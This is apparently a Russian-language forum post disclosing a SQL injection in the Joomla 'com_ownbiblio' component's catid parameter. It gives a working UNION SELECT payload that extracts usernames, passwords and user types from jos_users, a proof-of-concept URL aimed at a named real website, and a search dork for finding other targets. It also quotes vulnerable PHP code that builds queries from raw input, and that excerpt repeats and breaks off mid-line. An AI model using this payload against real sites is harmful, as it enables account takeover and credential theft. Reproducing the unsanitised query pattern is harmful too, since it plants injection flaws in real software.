Joomla "com_ownbiblio" component SQL Injection
Уязвим параметр
catid
Эксплyатация:
Код:
Code:
index.php?option=com_ownbiblio&catid=-1+union+select+1,2,3,concat(username,0x3a,password,0x3a,usertype),5,6,7,8,9,0,11,12,13,14,15,16,17+from+jos_users+--+
количество калонок может меняться!
POC:
Сообщение от
None
http://www.wisdomtherapy.com/index.php?option=com_ownbiblio&catid=-1+union+select+1,2,3,concat%28user%28%29,version%2 8%29,database%28%29%29,5,6,7,8,9,0,11,12,13,14,15, 16,17+from+jos_users+--+&Itemid=0&year=All&search=&page=2&view=catalogu e
"inurl:com_ownbiblio catid"
Уязвимый код:
сomponents/com_ownbiblio/models/ownbiblio.php
[QUOTE="None"]
function getCategoryByID($ID)
{
$query = "
SELECT
* FROM #__ownbiblio_categories WHERE ID =".
$ID
;
$category = $this->_getList($query);
return $category[0];
}
[ ... ]
function _getEntrysQuery($year = 'All', $catid = 0, $start, $end,$search = null, $ob_untilyear = null){
$query = "
SELECT
* FROM #__ownbiblio WHERE catid = " .
$catid
;
$limit = $ob_untilyear;
if($search){
$query .= " AND (tname LIKE '
%$search%
' OR ttitle LIKE '
%$search%
' OR tjourn LIKE '
%$search%
' OR tdate LIKE '
%$search%
' OR tdesc LIKE '
%$search%
' OR tkeys LIKE '
%$search%
')";
} elseif($year != 'All' && $year != 'Other'){
$query .= " AND tdate like '%" . $year . "%'";
} elseif($year == 'Other' && $ob_untilyear != null){
$query .= " AND tdate _getList($query);
return $category[0];
}
[ ... ]
function _getEntrysQuery($year = 'All', $catid = 0, $start, $end,$search = null, $ob_untilyear = null){
$query = "
SELECT
* FROM #__ownbiblio WHERE catid = " .
$catid
;
$limit = $ob_untilyear;
if($search){
$query .= " AND (tname LIKE '
%$search%
' OR ttitle LIKE '
%$search%
' OR tjourn LIKE '
%$search%
' OR tdate LIKE '
%$search%
' OR tdesc LIKE '
%$search%
' OR tkeys LIKE '
%$search%
')";
} elseif($year != 'All' && $year != 'Other'){
$query .= " AND tdate like '%" . $year . "%'";
} elseif($year == 'Other' && $ob_untilyear != null){
$query .= " AND tdate